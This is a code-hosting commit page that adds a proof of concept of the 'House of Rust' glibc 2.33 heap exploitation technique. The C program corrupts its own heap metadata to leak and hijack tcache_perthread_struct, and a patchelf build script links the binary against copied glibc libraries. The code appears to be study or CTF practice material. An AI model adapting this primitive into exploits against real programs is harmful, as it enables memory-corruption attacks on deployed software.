Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
_sky123_
attachment
提交
42595a25
A
attachment
项目概览
_sky123_
/
attachment
通知
29
Star
3
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
DevOps
流水线
流水线任务
计划
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
A
attachment
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
DevOps
DevOps
流水线
流水线任务
计划
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
流水线任务
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
42595a25
编写于
8月 20, 2023
作者:
_sky123_
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
update
上级
d56ae01a
变更
5
隐藏空白更改
内联
并排
Showing
5 changed file
with
70 addition
and
0 deletion
+70
-0
house_of_poc/house_of_rust/house_of_rust
house_of_poc/house_of_rust/house_of_rust
+0
-0
house_of_poc/house_of_rust/house_of_rust.c
house_of_poc/house_of_rust/house_of_rust.c
+51
-0
house_of_poc/house_of_rust/ld-2.33.so
house_of_poc/house_of_rust/ld-2.33.so
+0
-0
house_of_poc/house_of_rust/libc-2.33.so
house_of_poc/house_of_rust/libc-2.33.so
+0
-0
house_of_poc/house_of_rust/patch.sh
house_of_poc/house_of_rust/patch.sh
+19
-0
未找到文件。
house_of_poc/house_of_rust/house_of_rust
0 → 100755
浏览文件 @
42595a25
文件已添加
house_of_poc/house_of_rust/house_of_rust.c
0 → 100755
浏览文件 @
42595a25
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#define TCACHE_NUM 7
#define SMALL_NUM 7
int
main
()
{
void
*
tcache_chunk
[
TCACHE_NUM
];
size_t
*
small_chunk
[
SMALL_NUM
];
for
(
int
i
=
0
;
i
<
TCACHE_NUM
;
i
++
)
{
tcache_chunk
[
i
]
=
malloc
(
0x88
);
}
for
(
int
i
=
0
;
i
<
SMALL_NUM
;
i
++
)
{
small_chunk
[
i
]
=
malloc
(
0x88
);
malloc
(
0x10
);
}
for
(
int
i
=
0
;
i
<
TCACHE_NUM
;
i
++
)
{
free
(
tcache_chunk
[
i
]);
}
for
(
int
i
=
0
;
i
<
SMALL_NUM
;
i
++
)
{
free
(
small_chunk
[
i
]);
}
free
(
malloc
(
0x500
));
small_chunk
[
SMALL_NUM
-
1
][
-
1
]
=
0xb1
;
free
(
small_chunk
[
SMALL_NUM
-
1
]);
size_t
tcache_perthread_struct
=
small_chunk
[
SMALL_NUM
-
1
][
1
];
printf
(
"[*] tcache_perthread_struct: %p
\n
"
,
tcache_perthread_struct
);
size_t
*
large_chunk
=
malloc
(
0x420
);
malloc
(
0x500
);
void
*
unsorted_chunk
=
malloc
(
0x410
);
malloc
(
0x500
);
free
(
large_chunk
);
free
(
malloc
(
0x500
));
large_chunk
[
3
]
=
tcache_perthread_struct
-
8
;
free
(
unsorted_chunk
);
malloc
(
0x500
);
for
(
int
i
=
0
;
i
<
TCACHE_NUM
;
i
++
)
{
tcache_chunk
[
i
]
=
malloc
(
0x88
);
}
malloc
(
0x88
);
printf
(
"[+] hijack tcache_perthread_struct: %p
\n
"
,
malloc
(
0x88
));
_exit
(
0
);
}
\ No newline at end of file
house_of_poc/house_of_rust/ld-2.33.so
0 → 100755
浏览文件 @
42595a25
文件已添加
house_of_poc/house_of_rust/libc-2.33.so
0 → 100755
浏览文件 @
42595a25
文件已添加
house_of_poc/house_of_rust/patch.sh
0 → 100755
浏览文件 @
42595a25
#!/bin/bash
FILE_NAME
=
house_of_rust
GLIBC_VERSION
=
2.33
ARCH
=
amd64
gcc
${
FILE_NAME
}
.c
-o
$FILE_NAME
-g
sudo cp
/glibc/
${
GLIBC_VERSION
}
/
${
ARCH
}
/lib/libc-
${
GLIBC_VERSION
}
.so
.
sudo cp
/glibc/
${
GLIBC_VERSION
}
/
${
ARCH
}
/lib/ld-
${
GLIBC_VERSION
}
.so
.
sudo chmod
777 ./
${
FILE_NAME
}
sudo chmod
777 ./libc-
${
GLIBC_VERSION
}
.so
sudo chmod
777 ./ld-
${
GLIBC_VERSION
}
.so
patchelf
--replace-needed
libc.so.6 ./libc-
${
GLIBC_VERSION
}
.so ./
${
FILE_NAME
}
patchelf
--set-interpreter
./ld-
${
GLIBC_VERSION
}
.so ./
${
FILE_NAME
}
#gdb ${FILE_NAME}
\ No newline at end of file
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录